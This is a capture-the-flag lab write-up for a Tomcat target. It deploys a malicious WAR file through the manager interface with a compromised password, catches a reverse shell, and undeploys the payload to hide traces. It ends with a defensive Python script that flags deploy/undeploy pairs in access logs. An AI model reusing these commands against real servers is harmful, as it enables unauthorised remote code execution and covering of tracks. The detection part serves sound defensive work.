Malicious WAR Deployment


A manager credential for the Tomcat instance has been compromised via the LFI vulnerability in the file parameter of /news.php in the web application on target port 80.

Compromising a manager credential provides an opportunity to gain command execution via malicious WAR deployment.

According to the official Tomcat 9 documentation, a WAR file can be deployed remotely through an HTTP request to the manager application.

Deployment


┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ curl --upload-file shell.war 'http://tomcat:$3cureP4s5w0rd123!@megahosting.htb:8080/manager/text/deploy?path=/shell'
OK - Deployed application at context path [/shell]

Deploying the WAR payload via curl. The payload is now available at the /shell context path and is activated by requesting it.

┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ curl -s -I http://megahosting.htb:8080/shell                                                                        
HTTP/1.1 200 
Content-Length: 0
Date: Sat, 23 Sep 2023 11:00:56 GMT

Activating the payload by sending a request to the /shell endpoint, which triggers the reverse shell callback below.

┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.194] 49908
whoami
tomcat
hostname
tabby
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.194  netmask 255.255.255.0  broadcast 10.10.10.255
        ether 00:50:56:b9:7b:bb  txqueuelen 1000  (Ethernet)
        RX packets 2492789  bytes 399900483 (399.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2543603  bytes 1289861911 (1.2 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 18436  bytes 1439809 (1.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 18436  bytes 1439809 (1.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial foothold established on the target system as the tomcat user via malicious WAR deployment.

Undeployment


┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ curl 'http://tomcat:$3cureP4s5w0rd123!@megahosting.htb:8080/manager/text/undeploy?path=/shell'                      
OK - Undeployed application at context path [/shell]

Undeploying the WAR payload for OPSEC, so the deployed application does not remain on the server.
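From the defender's side, the deploy, trigger and undeploy sequence shown above leaves a distinctive trace in Tomcat's access log: a successful deploy request against the manager text interface, followed shortly afterwards by an undeploy of the same context path from the same source. The following Python script is an added example (not code from the original writeup) that parses access-log lines in the default `AccessLogValve` common pattern, extracts manager deploy/undeploy actions, and pairs a deploy with a later undeploy of the same context within a configurable window. The log lines are constructed for the example; the field layout, window size and the action names are assumptions.

```python
"""Flag WAR deploy/undeploy activity against the Tomcat manager in access logs.

Added example for this writeup, not part of the original page. It assumes
Tomcat's AccessLogValve with the default "common" pattern:
    %h %l %u %t "%r" %s %b
"""
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# One access-log line in the "common" pattern.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Manager actions reachable through the text or HTML interface,
# e.g. /manager/text/deploy or /manager/html/upload.
ACTION_RE = re.compile(r'^/manager/(?:text|html)/(?P<action>[a-z]+)$')
DEPLOY_ACTIONS = {"deploy", "upload"}
UNDEPLOY_ACTIONS = {"undeploy"}

# Constructed sample lines modelled on the sequence in the writeup
# (deploy, request the context, undeploy), plus unrelated manager traffic.
SAMPLE_LOG = """\
10.10.16.5 - tomcat [23/Sep/2023:11:00:41 +0000] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 48
10.10.16.5 - - [23/Sep/2023:11:00:56 +0000] "HEAD /shell HTTP/1.1" 200 -
10.10.16.5 - tomcat [23/Sep/2023:11:03:12 +0000] "GET /manager/text/undeploy?path=/shell HTTP/1.1" 200 50
192.0.2.10 - admin [23/Sep/2023:11:10:00 +0000] "GET /manager/html HTTP/1.1" 200 12345
"""


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def manager_events(log_text):
    """Extract manager actions (deploy, undeploy, ...) with their context path."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        am = ACTION_RE.match(parts.path)
        if not am:
            continue
        # The text interface carries the context in ?path=...; the HTML
        # upload form derives it from the WAR filename, so it may be absent.
        ctx = parse_qs(parts.query).get("path", [None])[0]
        events.append({
            "ip": rec["ip"], "user": rec["user"], "ts": rec["ts"],
            "method": rec["method"], "action": am["action"],
            "context": ctx, "status": rec["status"],
        })
    return events


def deploy_undeploy_pairs(events, window=timedelta(minutes=15)):
    """Pair each deploy with a later undeploy of the same context from the same IP.

    A short-lived context deployed and removed by one client is the pattern
    left by a throwaway payload; a status of 200 alone is not proof, because
    the text interface also answers "FAIL - ..." with 200, so the status is
    kept in the event for the analyst rather than used to filter.
    """
    pending = {}
    pairs = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["ip"], ev["context"])
        if ev["action"] in DEPLOY_ACTIONS:
            pending[key] = ev["ts"]
        elif ev["action"] in UNDEPLOY_ACTIONS and key in pending:
            delta = ev["ts"] - pending.pop(key)
            if delta <= window:
                pairs.append({
                    "ip": ev["ip"], "user": ev["user"], "context": ev["context"],
                    "lifetime_s": int(delta.total_seconds()),
                })
    return pairs


if __name__ == "__main__":
    evs = manager_events(SAMPLE_LOG)
    for ev in evs:
        print(f"{ev['ts']:%H:%M:%S} {ev['ip']} {ev['user']} {ev['action']} {ev['context']}")
    for p in deploy_undeploy_pairs(evs):
        print(f"short-lived context {p['context']} from {p['ip']} ({p['lifetime_s']}s)")
```

In practice the same log also shows which account performed the action, so an unexpected user on `/manager/text/deploy` is itself worth an alert; the pairing logic only adds confidence when the context is removed again quickly. Note that the text interface used by `curl` here requires the `manager-script` role, so not granting that role to accounts that only need the HTML interface removes this path entirely.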